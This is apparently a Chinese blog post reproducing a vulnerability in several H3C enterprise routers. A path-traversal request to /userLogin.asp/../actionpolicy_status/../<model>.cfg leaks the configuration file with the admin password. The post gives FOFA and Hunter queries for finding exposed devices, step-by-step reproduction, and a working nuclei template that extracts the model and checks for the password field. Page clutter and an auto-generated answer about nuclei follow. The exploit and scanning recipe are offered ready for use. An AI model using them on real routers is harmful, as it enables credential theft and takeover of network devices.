(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码

2、资产指纹

fofa:app=“H3C-Ent-Router”
hunter:app.name=“H3C Router Management”

3、漏洞复现

访问路由器web页面,获取页面title中的路由器型号,以下图为例,路由器型号为ER8300G2。在这里插入图片描述
http://ip//userLogin.asp/…/actionpolicy_status/…/型号.cfg依据路由器型号拼接url:http://ip//userLogin.asp/…/actionpolicy_status/…/ER8300G2.cfg使用burpsuite发送请求,获得管理员密码等敏感信息。在这里插入图片描述

4、nuclei yaml文件

id: h3cinfor

info:
  name: h3cinfor
  author: xxx
  severity: critical
  description: 华三路由器存在敏感信息泄露漏洞


http:
  - raw:
    - |
      GET /userLogin.asp HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: none
      Sec-Fetch-User: ?1
      Priority: u=1
      Te: trailers
      Connection: close
      
    - |
      GET /userLogin.asp/../actionpolicy_status/../{{id}}.cfg HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Priority: u=1
    
    extractors:
      - type: regex
        name: id
        group: 1
        regex: 
         - "<title>(.*?)系统管理</title>"
        internal: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && (contains_all(body_2,"vtypasswd"))'

  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
关于nucleiyaml的问题,根据引用和引用中的内容,nuclei是一个用于执行网络安全扫描的工具,可以通过命令行来使用。而yaml则是一种用于描述数据序列化格式的语言。 在引用中,展示了一个使用nuclei的命令行示例。其中,使用了参数来指定待扫描的目标URL、指定扫描的标签、指定扫描的严重程度、指定扫描的作者,并将扫描结果输出到result.txt文件中。 而在引用中,展示了一个使用nuclei进行调试扫描的命令行示例。其中,使用了参数来指定待扫描的目标URL和使用的模板文件(使用了yaml格式的模板文件)。 综上所述,nuclei是一个可以通过命令行使用的网络安全扫描工具,而yaml则是用于描述数据序列化格式的语言,可以用来编写nuclei的模板文件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [POC模拟攻击利器 —— Nuclei入门(一)](https://blog.csdn.net/liwenxiang629/article/details/125995096)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [Nuclei——一款基于YAML语法模板的快速漏洞扫描工具](https://blog.csdn.net/asaotomo/article/details/122395708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值